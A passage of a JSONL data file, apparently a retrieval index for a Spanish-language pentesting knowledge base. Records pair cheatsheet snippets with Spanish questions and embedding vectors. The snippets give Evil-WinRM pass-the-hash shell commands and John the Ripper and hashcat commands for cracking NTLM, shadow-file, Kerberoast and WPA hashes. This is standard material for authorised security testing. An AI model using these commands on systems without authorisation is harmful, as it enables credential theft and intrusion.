-0.03146, 0.00467, -0.09426, -0.01463, 0.05932, -0.03928, -0.10539, 0.01483, 0.03638, -0.06471, 0.00231, -0.02143, -0.06981, -0.09351, -0.01691, 0.14316, -0.01167, 0.06204, 0.03002, 0.08052, -0.08552, 0.05028, 0.04244, 0.03672, 0.06951, -0.05928, 0.09325, 0.11233, -0.09505, -0.12986, -0.12216, -0.03457, -0.02788, -0.06958, 0.21601, -0.19264, 0.01613, -0.08304, -0.1284, 0.0404, -0.10169, -0.0441, 0.03131, -0.0304, -0.02913, -0.08678, -0.06726, 0.06753, -0.09885, -0.0184, 0.06753, -0.0655, 0.02416, 0.02452, -0.05023, -0.02854, 0.09617, -0.01034, 0.03638, 0.05295, -0.02369, 0.00143, -0.11945, -0.1464, 0.05778, -0.04018, 0.03581, -0.10065, 0.07358, 0.05653, -0.05926, 0.06215, -0.00554, -0.0522, 0.04217, -0.0788, 0.01573, -0.0076, 0.06349, -0.00985, -0.07803, 0.06635, -0.02902, 0.07792, 0.02733, -0.04944, -0.06186, -0.02119, 0.09774, 0.03805, -0.03428, -0.0185, -0.04178, 0.01988, -0.03327, -0.04851, 0.03439, 0.03804, -0.05586, 0.00627, -0.03517, -0.0075, 0.01131, -0.04816, -0.02487, 0.04067, -0.04408, -0.04335, 0.00691, -0.04982, -0.06984, -0.02284, -0.02093, -0.01481, 0.03343, -0.11136, -0.00885, -0.10097, 0.08091, 0.06593, 0.01008, -0.05667, 0.0199, -0.0001, 0.12922, 0.01385, -0.0455, 0.03056, 0.03558, -0.09987, -0.04629, -0.00116, -0.09799, -0.02022, -0.01932, 0.03114, -0.10008, 0.05497, -0.01584, -0.03368, 0.05345, 0.03078, -0.0122, -0.03733, -0.03417, -0.00028, 0.07932, 0.03593, -0.06127, 0.07499, 0.03064, -0.04578, -0.03392, -0.0185, -0.05091, -0.01172, -0.00799, -0.05585, -0.06033, -0.00858, -0.03955, -0.04561, -0.02796, -0.01878, -0.00946, -0.02425, -0.05438, 0.01442, -0.03814, 0.00832, -0.01642, -0.00987, 0.0852, -0.02349, -0.05949, -0.00391, 0.04293, 0.00763, -0.05099, -0.0466, -0.00641, -0.03141, 0.05781, 0.062, -0.0239, 0.03467, 0.04939, 0.05312, 0.0116, -0.01096, 0.06422, -0.01678, 0.01824, -0.06696, 0.04718, -0.04319, -0.00467, -0.00608, 0.01447, -0.00174, 0.01886, -0.01938, 0.01155, 0.0423, -0.00315, 0.00419, 0.03095, -0.06354, 0.01479, -0.00198, 0.02684, 0.01687, 0.02144, -0.08441, 0.03322, -0.04727, -0.05353, -0.05425, -0.04011, 0.08523, -0.0226, -0.04154, -0.04794, -0.09964, -0.01475, -0.01698, -0.04539, -0.08465, -0.05596, -0.05573, 0.05547, -0.01438, -0.02112, 0.00707]} -{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# Evil-WinRM (shell interactiva Windows)\nevil-winrm -i IP -u USER -p PASS\nevil-winrm -i IP -u USER -H HASH # pass-the-hash\n```", "indexar": "cual es una alternativa libre para el acceso por hash a servidores remotos?", "v": [0.09876, 0.00192, -0.1136, -0.10036, -0.00304, -0.02588, 0.04915, -0.1065, -0.08376, 0.05021, -0.12693, -0.14298, 0.05262, 0.01731, 0.22165, -3e-05, 0.1045, 0.05154, -0.00086, 0.07357, -0.01244, 0.00553, -0.06348, 0.05885, -0.06819, -0.07652, 0.07, 0.05791, -0.12377, -0.03711, 0.08141, -0.11453, -0.02038, 0.04674, -0.02107, 0.04227, 0.04745, 0.24896, 0.02357, 0.01334, 0.1101, -0.00545, -0.15545, -0.01256, 0.03097, -0.11808, -0.02651, -0.00291, 0.06663, -0.00836, -0.06971, -0.05652, -0.10816, -0.0289, -0.00103, -0.018, 0.18239, -0.06326, -0.08575, -0.01741, -0.11958, 0.04578, 0.01764, -0.04106, 0.03366, -0.10928, -0.06297, -0.03256, -0.1696, 0.03595, -0.0451, 0.00465, 0.02016, -0.06595, -0.10315, 0.10097, -0.13006, -0.06034, 0.06829, 0.04043, -0.02182, -0.05902, 0.02156, 0.00744, -0.18951, -0.14669, 0.09073, -0.03598, 0.00265, 0.006, 0.10019, 0.04951, 0.00135, 0.08106, -0.00194, -0.03293, 0.05376, -0.00774, -0.04112, 0.0077, 0.00535, 0.09598, -0.02581, 0.05893, -0.04392, 0.00837, 0.06782, -0.0273, 0.01422, -0.02018, 0.05222, -0.01614, -0.0138, 0.00077, -0.03191, -0.10402, -0.03454, 0.01397, 0.00705, 0.03561, -0.08785, -0.03721, 0.0473, -0.01256, 0.07782, -0.02189, 0.00491, 0.0251, -0.04013, -0.01275, 0.05378, -0.01519, -0.08401, -0.06715, -0.06987, -0.01674, 0.06973, -0.08136, 0.0239, -0.06521, 0.01701, 0.03827, -0.0033, -0.01461, 0.08699, -0.03439, 0.06093, -0.02136, -0.02501, -0.02565, -0.06192, -0.02635, -0.03727, 0.08184, -0.10392, 0.02729, -0.09243, -0.08849, -0.13604, 0.09279, 0.00444, 0.01802, -0.0028, 0.03069, 0.0008, -0.02723, 0.01027, -0.03455, 0.01328, 0.04919, -0.11124, 0.05353, 0.02478, -0.08418, -0.02192, -0.06014, -0.05398, -0.0517, 0.04698, -0.02947, -0.00974, 0.03418, -0.07281, -0.05099, 0.01157, -0.00703, 0.00278, 0.01871, 0.02689, 0.0125, -0.01524, -0.00376, -0.09674, 0.01391, 0.01784, -0.01873, -0.04021, -0.04485, -0.0028, -0.02518, -0.03533, -0.03237, 0.01992, -0.03891, 0.03083, -0.02342, -0.04959, 0.04701, -0.01524, 0.08702, 0.02459, -0.03749, 0.1262, 0.0014, -0.05049, -0.00823, 0.04116, -0.07128, -0.00237, -0.01517, 0.01054, 0.04095, 0.03351, 0.00627, 0.00679, 0.07558, 0.05132, 0.06415, 0.02704, -0.02733, -0.00114, 0.02893, -0.01376, -0.00342, -0.00314, -0.03837, -0.00268, -0.03422, -0.01411, -0.0324, -0.00287, 0.10856, -0.03962, -0.04448, -0.03206, -0.08626, -0.12032, 0.01764, -0.065, -0.02787, -0.03801, 0.01614, 0.05124, 0.02007, -0.00054, -0.02542]} -{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# Evil-WinRM (shell interactiva Windows)\nevil-winrm -i IP -u USER -p PASS\nevil-winrm -i IP -u USER -H HASH # pass-the-hash\n```", "indexar": "con que puedo montar una sesiΓ³n de shell interactiva sobre una mΓ‘quina Windows sin contraseΓ±a?", "v": [0.07093, 0.07086, -0.14951, -0.18341, -0.13892, -0.0987, -0.22315, -0.05105, 0.00908, -0.09659, -0.06138, 0.02949, 0.03277, -0.09659, 0.0196, 0.08727, 0.00967, -0.03125, 0.03061, 0.02871, 0.01879, -0.02129, -0.04725, -0.02207, 0.02192, 0.08601, 0.06817, -0.02845, -0.11032, -0.07842, 0.00069, -0.05197, 0.07952, 0.00796, -0.02783, -0.00169, -0.02354, 0.07046, 0.13192, 0.06259, -0.0257, 0.09673, -0.12951, 0.20017, 0.1353, 0.02564, 0.08791, -0.06555, 0.07862, 0.08019, -0.04571, -0.04646, -0.04624, 0.05324, 0.00493, -0.13649, 0.21507, -0.06394, 0.09045, -0.03239, -0.08971, 0.15825, -0.06902, 0.11068, -0.02168, -0.00878, 0.02793, -0.03818, -0.02057, 0.12838, -0.03336, -0.11074, -0.02656, 0.00957, 0.05918, 0.02931, 0.01352, -0.03466, 0.08315, 0.0521, -0.04674, 0.00401, 0.1119, 0.01402, -0.09758, -0.02701, 0.0227, -0.07214, 0.08292, -0.1169, 0.07471, -0.01039, -0.02859, -0.0003, 0.04402, -0.07879, 0.00496, 0.04372, -0.00467, 0.03069, -0.02892, 0.00889, -0.02242, 0.18847, 0.00896, 0.02045, -0.01003, -0.00613, -2e-05, -0.06725, 0.07022, 0.02589, -0.09693, -0.06138, -0.05258, -0.0459, -0.07314, -0.05707, -0.00645, 0.05811, -0.06126, -0.00254, 0.0026, -0.04478, 0.01393, -0.02205, 0.00115, 0.12274, -0.1112, -0.03545, 0.03557, -0.00211, -0.03238, -0.0169, -0.02748, 0.07914, 0.00217, -0.11978, -0.09957, -0.10729, 0.08249, 0.08008, 0.02036, -0.06125, -0.00549, 0.04865, 0.10392, -0.01729, -0.07283, 0.04521, 0.05103, -0.00414, 0.06558, 0.04115, -0.04298, 0.05285, 0.02141, 0.03291, 0.02653, 0.06588, -0.04163, -0.03177, -0.07124, 0.02599, -0.08077, -0.02056, -0.0997, 0.04386, 0.0355, -0.01625, -0.0201, 0.08261, 0.03473, 0.00744, 0.01504, 0.03409, 0.01187, -0.00766, 0.01531, -0.08419, -0.04354, -0.01215, -0.00345, -0.07839, -0.07981, -0.02462, 0.02182, 0.01386, -0.05278, -0.02672, 0.02282, 0.00888, -0.00595, 0.02745, 0.0341, -0.02291, -0.03512, 0.0054, 0.04393, -0.00195, -0.02422, 0.04477, -0.03931, -0.01913, 0.07141, 0.02268, -0.06883, 0.0049, 0.04488, -0.01348, 0.03132, 0.03153, 0.03315, -0.04365, 0.0061, -0.04261, 0.01373, 0.00859, -0.05367, 0.01006, 0.05483, 0.04546, 0.06199, 0.04764, 0.00337, -0.03671, -0.025, 0.03786, 0.04204, -0.00148, -0.0349, 0.05017, 0.01248, 0.03558, 0.06626, 0.01194, -0.01031, -0.03352, -0.04366, -0.01946, -0.04114, 0.07926, 0.01876, -0.09937, -0.03364, -0.02143, -0.034, 0.00129, -0.02144, -0.04419, -0.08903, -0.02934, 0.01341, -0.01136, -0.0383, 0.01574]} -{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# John\njohn --wordlist=WL hashes.txt\njohn --wordlist=WL --format=NT hashes.txt\nzip2john fichero.zip > hash; john hash\nssh2john id_rsa > hash; john --wordlist=WL hash", "indexar": "que programa sirve para recuperar contraseΓ±as de archivos comprimidos y cifrados?", "v": [0.22942, -0.03614, -0.06155, -0.20873, 0.06549, -0.19209, 0.05322, -0.0579, -0.16142, -0.08984, 0.03194, -0.05054, -0.00195, -0.05148, 0.04983, -0.06604, 0.11515, -0.02219, 0.11561, 0.02751, 0.07156, -0.07398, 0.02456, -0.09253, -0.0383, -0.02929, 0.01383, 0.0939, -0.0791, -0.04873, -0.00479, -0.04607, 0.1066, -0.01984, -0.03255, 0.21493, -0.00941, 0.11111, -0.0359, 0.06993, 0.1353, 0.09309, -0.08688, 0.00549, 0.02845, -0.03718, 0.00445, 0.08623, 0.07986, -0.06131, -0.08001, -0.05315, 0.01955, -0.0679, -0.09282, -0.11895, -0.05579, -0.00584, -0.08937, 0.06017, -0.06877, 0.03406, 0.09751, 0.05408, -0.03845, -0.07687, 0.02657, 0.04431, -0.14668, 0.08556, -0.0203, 0.15499, -0.00079, 0.01196, -0.01377, -0.01345, -0.02169, -0.07783, 0.03537, 0.06243, -0.03601, -0.10765, -0.00684, -0.03457, -0.06724, 0.01016, 0.05096, 0.0483, 0.02682, -0.04747, 0.02744, -0.05952, -0.03656, 0.09086, -0.01055, -0.0337, 0.0606, 0.059, -0.05331, 0.02281, 0.01179, 0.02779, -0.01676, 0.08232, -0.01961, 0.11925, -0.00993, 0.03545, -0.04623, 0.00488, -0.01941, -0.02767, 0.04912, -0.00101, -0.0871, -0.02141, 0.04922, -0.0075, 0.05792, -0.04313, 0.0366, 0.06229, -0.05843, -0.00564, 0.00431, 0.02675, -0.00199, 0.03176, -0.09113, -0.02291, 0.01624, 0.03127, -0.00694, 0.00754, -0.05662, 0.00612, 0.05139, 0.00615, -0.05597, 0.00233, 0.12866, 0.07182, 0.01285, 0.02102, 0.11041, 0.03702, 0.1194, 0.02133, -0.02122, 0.0119, 0.03571, 0.04066, 0.04703, 0.04707, -0.04919, 0.06423, -0.02624, -0.12164, -0.10344, 0.08618, -0.05048, -0.00811, -0.06538, 0.02203, -0.03453, -0.03976, -0.00787, 0.0822, 0.06037, 0.10535, -0.02417, 0.00741, 0.05714, -0.09487, 0.01186, 0.02305, -0.0583, -0.04117, 0.08102, -0.12902, 0.00294, -0.02626, 0.03133, 0.00343, 0.0028, -0.05307, 0.00388, 0.0405, -0.01885, -0.00756, 0.02548, -0.0316, -0.06651, -0.0172, -0.05363, -0.04198, -0.08774, 0.0433, 0.08873, -0.07357, -0.03054, 0.01522, -0.04752, -0.0254, 0.03271, -0.00896, -0.06604, -0.06675, -0.00714, 0.01962, -0.03478, 0.02059, -0.00315, 0.03099, -0.06382, -0.10931, 0.02469, 0.07148, 0.02388, 0.01335, 0.01321, 0.04767, 0.00342, 0.05985, 0.01298, -0.07772, -0.00538, 0.00473, 0.01867, 0.00512, -0.05517, 0.01485, 0.0069, 0.05372, 0.0738, -0.02299, -0.07023, -0.04191, -0.0297, -0.02708, -0.06692, 0.09301, 0.00627, -0.0091, -0.06167, 0.00744, 0.00155, -0.01655, 0.05968, 0.04611, -0.07452, 0.10983, 0.03295, 0.03623, 0.01879, 0.02483]} -{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# John\njohn --wordlist=WL hashes.txt\njohn --wordlist=WL --format=NT hashes.txt\nzip2john fichero.zip > hash; john hash\nssh2john id_rsa > hash; john --wordlist=WL hash", "indexar": "con quΓ© puedo convertir un hash en contraseΓ±a si tengo una lista de palabras clave?", "v": [-0.03432, 0.03883, -0.11828, -0.11117, -0.08641, -0.13453, -0.08569, -0.00663, -0.06291, -0.12392, -0.05117, 0.00929, -0.02052, -0.02158, 0.08489, 0.07677, 0.16731, 0.00595, 0.08384, 0.03228, 0.03711, -0.12624, -0.15806, -0.05109, -0.03259, -0.1241, 0.00596, 0.11108, -0.13256, -0.01776, -0.02947, -0.08066, 0.01758, 0.0705, -0.00554, 0.23694, -0.02923, 0.17743, 0.0356, 0.0853, 0.05803, 0.0896, -0.12439, 0.18819, -0.04111, -0.04945, 0.00074, 0.04702, 0.07607, -0.01086, -0.06102, -0.08127, -0.09795, -0.1033, -0.01209, -0.09856, 0.1488, 0.04251, -0.04425, -0.05679, -0.14146, 0.05981, 0.03395, 0.04062, -0.06655, -0.03711, 0.00939, 0.06613, -0.025, 0.12473, 0.01409, -0.01101, -0.06532, 0.03341, 0.05068, 0.04237, 0.10539, -0.06356, -0.01479, 0.14032, -0.01228, -0.08106, 0.03232, -0.0263, -0.03671, -0.00691, 0.06345, -0.00925, 0.10173, -0.04563, 0.00536, -0.03872, 0.00355, -0.00223, -0.0062, -0.00129, -0.06468, 0.03609, -0.05934, -0.07451, 0.0043, 0.03826, -0.03897, 0.15905, -0.02047, 0.0079, 0.00449, -0.01427, -0.00805, -0.04006, 0.07251, 0.01342, -0.03676, -0.11262, -0.05791, -0.0099, -0.0186, -0.09114, -0.04411, -0.01177, -0.07695, -0.04471, 0.03035, 0.03403, 0.06245, 0.05533, -0.04747, 0.02799, -0.06978, -0.0252, 0.00213, 0.09382, -0.02608, -0.08424, 0.03809, 0.04983, 0.01731, -0.07325, -0.04003, 0.00095, -0.04803, -0.00758, -0.03718, -0.02626, 0.05812, -0.0233, 0.05295, -0.01753, -0.13591, -0.00888, -0.0323, -0.02967, 0.07025, 0.05521, -0.02796, 0.03973, -0.01421, -0.05248, 0.00415, 0.07067, -0.03268, -0.02895, -0.10062, 0.04248, -0.0397, -0.04167, -0.0115, 0.03596, 0.05095, 0.03809, 0.00382, -0.00417, 0.05474, -0.02635, 0.01329, 0.00474, -0.01991, 0.00635, -0.08411, -0.11844, -0.03859, -0.02766, -0.09421, -0.03899, 0.04112, -0.04734, 0.09617, -0.00033, -0.04662, -0.01078, 0.00053, 0.03404, -0.05142, 0.0221, 0.04586, -0.01247, -0.01991, 0.01617, -0.01806, -0.12682, 0.02237, -0.03423, 0.00674, -0.02341, 0.0186, 0.0269, -0.11286, -0.02168, -0.00797, 0.00766, 0.05429, 0.01428, -0.00255, -0.00119, -0.02413, -0.03173, -0.06133, 0.10608, -0.02383, -0.00229, 0.08251, 0.08584, 0.02728, 0.00496, -0.01309, -0.04361, -0.0525, 0.04993, 0.07164, 0.05818, -0.0554, 0.01747, -0.02673, 0.01624, 0.034, -0.02156, -0.08724, -0.03012, -0.03078, 0.01358, -0.01803, 0.01133, -0.03071, -0.08237, -0.04904, 0.02288, -0.04823, 0.0197, -0.02419, -0.00571, -0.09694, 0.00366, 0.01896, -0.03265, 0.05883, -0.01054]} -{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# John\njohn --wordlist=WL hashes.txt\njohn --wordlist=WL --format=NT hashes.txt\nzip2john fichero.zip > hash; john hash\nssh2john id_rsa > hash; john --wordlist=WL hash", "indexar": "cual es la alternativa libre a john para cracking de hashes?", "v": [0.12382, -0.04182, -0.01781, 0.08891, -0.05424, -0.09118, -0.1123, 0.03457, -0.0708, 0.09318, -0.04998, -0.14386, -0.08467, 0.09201, 0.08208, -0.00557, 0.01282, 0.01555, 0.06646, 0.033, -0.21537, 0.03257, -0.14569, -0.08381, -0.02761, -0.10181, -0.13558, 0.15143, -0.22478, -0.0204, 0.04153, -0.0764, 0.01382, 0.12309, -0.07135, 0.13287, 0.16607, 0.1359, 0.13447, 0.11968, -0.00217, -0.06881, -0.09643, 0.06301, -0.08406, -0.00662, -0.01041, 0.09049, -0.00332, 0.09761, -0.04471, -0.02053, -0.18, 0.00842, 0.10995, -0.07543, 0.07351, -0.01963, -0.18521, -0.09428, -0.08494, 0.07188, 0.00223, -0.13487, 0.00655, -0.01743, 0.02026, -0.05252, 0.025, 0.09402, 0.11305, -0.03844, 0.03174, -0.03017, -0.0927, 0.09089, -0.00043, -0.04068, 0.00805, 0.04691, 0.08813, -0.04532, 0.08773, 0.07822, -0.08515, 0.03735, 0.00934, -0.08567, 0.03331, 0.15661, 0.0574, 0.03832, 0.00016, 0.13803, 0.00048, -0.06694, 0.08588, 0.09854, -0.04665, 0.07723, -0.00949, -0.01714, -0.07555, -0.0056, -0.01489, -0.06135, -0.02254, 0.02672, -0.03842, 0.0209, 0.08067, 0.04096, -0.02826, 0.03814, -0.07512, -0.05429, -0.00094, 0.04546, -0.0371, 0.0254, -0.00761, -0.04151, -0.02506, -0.0017, 0.04761, 0.05648, 0.02998, 0.0278, -0.07626, 0.02758, 0.0861, -0.01867, -0.07318, -0.05054, -0.0313, -0.0106, 0.12499, -0.0449, 0.0042, -0.04208, -0.01353, 0.05402, 0.04466, 0.01363, 0.03768, -0.03373, -0.0279, 0.02567, -0.02447, -0.02707, -0.00936, -0.01175, -0.00116, 0.04603, -0.00757, 0.00237, -0.03314, -0.0176, -0.08281, 0.08069, -0.03007, -0.00199, -0.01441, 0.04383, -0.03945, 0.05476, 0.05424, 0.01028, -0.06029, -0.002, 0.03668, 0.04481, 0.03935, -0.03059, 0.03759, -0.03625, -0.02839, -0.026, -0.01538, -0.06357, 0.03474, -0.01571, -0.03126, -0.01568, -0.01757, -0.04429, 0.03659, -0.00085, -0.00563, -0.02606, -0.03541, -0.00552, -0.08896, -0.0294, 0.01693, 0.02527, 0.06509, -0.0676, -0.01431, -0.05849, -0.05285, 0.00202, -0.00304, -0.05261, 0.00763, -0.00227, -0.01187, -0.05305, 0.02278, 0.06101, 0.0617, 0.0216, 0.02567, 0.04647, -0.03438, 0.00964, -0.01564, 0.0476, -0.00659, -0.00579, 0.02459, 0.05338, -0.01641, 0.02792, -0.03617, 0.00334, -0.02706, 0.026, -0.04492, 0.02578, 0.04202, 0.00914, 0.00965, 0.05737, -0.01703, -0.02514, -0.01383, 0.06642, 0.00461, 0.00278, 0.02249, 0.04414, -0.00664, 0.03228, -0.00518, 0.0215, -0.06839, 0.00598, -0.04856, 0.00539, -0.03114, 0.04957, -0.01709, 0.03406, -0.02356, 0.02709]} -{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# Hashcat (modo -m)\nhashcat -m 1000 hashes.txt WL # NTLM\nhashcat -m 0 hashes.txt WL # MD5\nhashcat -m 100 hashes.txt WL # SHA1\nhashcat -m 1800 hashes.txt WL # sha512crypt (/etc/shadow $6$)\nhashcat -m 13100 hashes.txt WL # Kerberoast (TGS)\nhashcat -m 18200 hashes.txt WL # AS-REP\nhashcat -m 5600 hashes.txt WL # NetNTLMv2 (Responder)\nhashcat -m 22000 hash.hc22000 WL # WPA/WPA2\n```", "indexar": "que programa puedo usar para intentar adivinar contraseΓ±as con hashes NTLM o MD5?", "v": [-0.05842, -0.05627, -0.11601, -0.13507, -0.05532, 0.051, -0.17439, 0.06293, -0.1648, 0.08173, 0.01157, 0.00479, 0.01556, -0.16667, -0.17367, 0.03063, 0.09801, -0.11311, 0.05048, 0.03723, -0.0556, -0.05739, -0.15886, -0.02028, 0.01035, -0.01442, -0.04753, -0.00154, -0.19672, -0.06511, -0.08105, -0.04049, -0.07253, 0.04432, -0.00746, 0.0921, -0.03442, 0.07275, 0.07738, 0.14497, 0.11863, 0.11855, -0.11597, 0.03854, 0.12922, -0.07799, -0.02566, -0.05877, 0.0731, -0.09607, -0.01872, 0.01964, -0.0905, -0.03515, 0.01114, -0.05125, 0.07446, -0.00225, -0.08182, 0.01185, -0.05397, 0.01449, 0.02934, -0.03222, -0.11507, -0.10455, 0.12484, 0.04067, -0.126, 0.08986, -0.10968, 0.08745, 0.02429, -0.01639, -0.01219, 0.072, 0.03243, -0.07589, 0.07434, 0.10883, -0.04626, -0.05804, 0.02006, -0.00435, -0.14623, -0.03079, 0.0328, -0.04945, 0.0323, -0.05639, 0.00602, 0.01916, 0.00384, -0.00397, 0.0434, -0.08907, 0.06296, 0.02968, 0.00175, -0.04229, 0.04717, 0.00559, -0.03829, 0.17368, -0.08721, 0.02496, 0.08023, -0.02457, 0.03441, 0.02163, 0.09503, -0.02747, -0.09815, -0.06822, -0.09104, 0.04207, -0.05635, -0.0524, 0.04815, -0.02272, -0.02341, 0.00042, 0.00945, 0.05599, 0.11252, 0.05326, -0.02299, 0.08058, -0.0873, 0.02713, 0.01385, -0.00589, -0.11015, -0.01877, -0.02583, -0.01467, -0.0009, -0.05109, -0.09035, -0.00449, 0.02826, 0.03014, 0.01461, 0.04494, 0.0316, 0.06742, -0.00512, -0.062, 0.03695, -0.01493, 0.07653, -0.00385, -0.01246, 0.03631, -0.01786, 0.00433, 0.05331, -0.05486, -0.1114, 0.11143, -0.02367, 0.03039, -0.02495, 0.04186, 0.02529, -0.04554, 0.05265, 0.00134, 0.06662, 0.07256, 0.03959, 0.04618, 0.00922, -0.07897, 0.01083, -0.01278, 0.02842, -0.07793, -0.01308, -0.08738, -0.01136, 0.02439, 0.01967, -0.0255, 0.06196, -0.02812, 0.04044, 0.01035, -0.02334, -0.10377, 0.01062, 0.05054, -0.04091, 0.039, 0.00344, 0.0054, 0.02448, -0.01533, 0.01392, -0.05392, -0.02226, 0.03066, -0.02426, -0.07941, 0.07765, 0.06214, -0.09928, -0.04161, -0.00814, 0.0678, 0.04578, -0.03449, 0.03636, 0.01132, -0.1109, -0.03744, -0.0297, 0.00768, -0.02156, -0.00603, -0.01425, 0.07472, 0.02862, 0.02907, 0.06382, -0.07739, -0.00361, 0.04692, 0.04483, 0.01592, -0.02046, -0.00099, -0.01301, -0.01614, 0.04091, 0.02632, -0.00557, -0.01193, -0.01704, -0.03153, -0.04536, 0.0494, 0.00178, -0.06176, -0.03874, 0.02843, -0.06673, 0.01163, -0.01155, 0.0475, -0.04351, 0.01933, 0.02919, -0.04491, 0.01333, 0.02821]} -{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# Hashcat (modo -m)\nhashcat -m 1000 hashes.txt WL # NTLM\nhashcat -m 0 hashes.txt WL # MD5\nhashcat -m 100 hashes.txt WL # SHA1\nhashcat -m 1800 hashes.txt WL # sha512crypt (/etc/shadow $6$)\nhashcat -m 13100 hashes.txt WL # Kerberoast (TGS)\nhashcat -m 18200 hashes.txt WL # AS-REP\nhashcat -m 5600 hashes.txt WL # NetNTLMv2 (Responder)\nhashcat -m 22000 hash.hc22000 WL # WPA/WPA2\n```", "indexar": "con quΓ© herramienta puedo probar ataques de fuerza bruta contra contraseΓ±as criptadas con SHA1 o sha512crypt?", "v": [-0.03542, -0.10343, -0.20626, -0.09813, -0.04492, -0.12487, 0.0161, 0.03135, -0.0064, -0.03746, -0.00419, 0.03059, -0.00077, -0.02748, 0.01716, -0.04426, 0.0208, -0.11603, -0.01251, 0.00603, 0.03418, -0.16447, -0.01212, -0.09977, -0.10856, -0.06282, -0.04301, 0.18536, -0.12133, 0.0278, 0.00984, 0.05988, 0.16825, 0.06296, 0.00824, 0.12146, -0.06375, 0.04149, 0.1157, 0.18722, 0.01273, 0.0132, -0.11099, 0.00894, 0.05601, -0.01604, -0.06304, 0.06915, 0.00465, 0.00837, -0.12033, -0.1235, -0.19712, -0.07136, -0.06359, -0.12875, 0.06139, -0.08939, -0.0444, -0.01018, -0.13268, 0.07851, 0.02359, -0.03209, 0.00184, -0.08952, -0.09286, -0.0147, -0.13826, 0.08736, -0.04992, 0.04479, -0.11576, 0.05813, -0.01479, 0.04705, 0.00596, 0.01436, 0.00143, 0.11785, -0.11412, 0.00064, -0.06045, 0.01735, -0.17783, -0.01672, 0.01903, -0.04507, -0.00608, -0.05785, 0.0189, 0.02276, 0.00636, 0.0529, 0.00602, -0.01718, -0.00331, -0.05774, -0.07053, -0.0882, 0.01048, -0.03499, -0.07046, 0.06081, 0.04077, -0.01327, -0.06071, 0.02382, 0.03694, -0.10493, 0.00716, 0.01039, -0.09337, 0.01229, 0.00106, -0.00902, -0.06284, -0.0682, 0.0218, -0.03155, -0.018, -0.01398, -0.09382, 0.07522, 0.01151, 0.08609, -0.05046, 0.04403, -0.02378, -0.14005, -0.03409, -0.0454, -0.04359, 0.042, -0.0106, 0.0641, 0.02333, -0.13964, -0.00749, -0.0264, 0.0465, 0.0419, 0.02921, -0.03598, 0.08944, 0.04862, -0.03015, -0.0303, -0.09951, 0.05676, 0.03161, -0.00545, 0.03698, 0.06199, -0.0589, 0.00051, -0.01055, -0.13319, -0.06118, 0.13119, -0.0277, -0.01421, -0.04254, 0.06355, -0.04855, -0.01561, 0.00657, 0.02463, 0.01912, 0.02597, 0.02913, 0.02644, 0.05256, -0.02317, 0.00939, -0.06922, -0.01226, -0.0377, -0.01874, -0.09579, -0.00921, -0.0161, -0.0391, 0.00715, 0.05239, -0.00119, 0.08759, -0.02355, 0.03533, -0.02995, -0.00308, 0.04352, -0.06336, 0.0323, -0.02169, -0.01228, -0.02339, 0.01354, -0.00758, -0.03161, -0.00242, -0.04428, -0.06191, -0.03049, 0.02643, 0.05865, -0.02655, -0.07372, -0.01772, 0.00587, 0.08019, -0.00855, 0.0519, -0.03578, -0.09681, -0.04803, 0.0023, 0.04196, -0.03233, 0.00351, -0.00551, 0.03703, 0.06976, -0.02066, 0.00813, -0.01042, -0.00843, -0.0091, 0.03139, 0.02246, 0.01514, 0.01237, -0.03772, 0.01001, 0.0394, 0.00289, -0.02335, 0.0244, -0.07987, -0.01519, -0.06877, 0.06359, 0.01942, -0.12295, -0.06669, -0.04121, -0.0217, -3e-05, -0.01663, -0.03465, -0.03458, 0.05747, 0.06096, -0.07669, 0.0076, -0.02256]} -{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# Hashcat (modo -m)\nhashcat -m 1000 hashes.txt WL # NTLM\nhashcat -m 0 hashes.txt WL # MD5\nhashcat -m 100 hashes.txt WL # SHA1\nhashcat -m 1800 hashes.txt WL # sha512crypt (/etc/shadow $6$)\nhashcat -m 13100 hashes.txt WL # Kerberoast (TGS)\nhashcat -m 18200 hashes.txt WL # AS-REP\nhashcat -m 5600 hashes.txt WL # NetNTLMv2 (Responder)\nhashcat -m 22000 hash.hc22000 WL # WPA/WPA2\n```", "indexar": "existe una alternativa gratuita a hashcat para recuperar contraseΓ±as de Kerberoasting y WPA/WPA2?", "v": [0.06734, -0.08905, -0.05284, -0.10206, -0.06396, -0.10394, 0.07233, -0.03656, -0.11819, -0.01254, 0.00606, -0.0772, -0.05446, 0.03971, 0.07929, 0.04525, -0.0877, 0.03707, 0.14613, 0.04603, 0.0232, 0.08623, -0.12352, 0.01072, -0.06369, -0.01479, -0.01489, 0.01813, -0.13346, 0.11651, 0.02353, -0.01015, -0.04655, 0.08837, -0.10609, 0.22468, -0.02799, 0.09383, 0.19494, 0.11907, 0.0539, 0.14316, 0.04409, 0.1635, -0.00082, -0.00285, -0.05281, 0.02379, 0.05341, 0.03567, -0.07851, -0.09386, -0.06525, -0.08995, 0.07413, -0.06591, 0.16713, -0.06083, -0.11214, -0.09933, -0.03829, 0.07608, -0.05061, -0.01265, -0.0004, -0.11656, 0.0367, -0.11211, -0.03291, 0.11233, 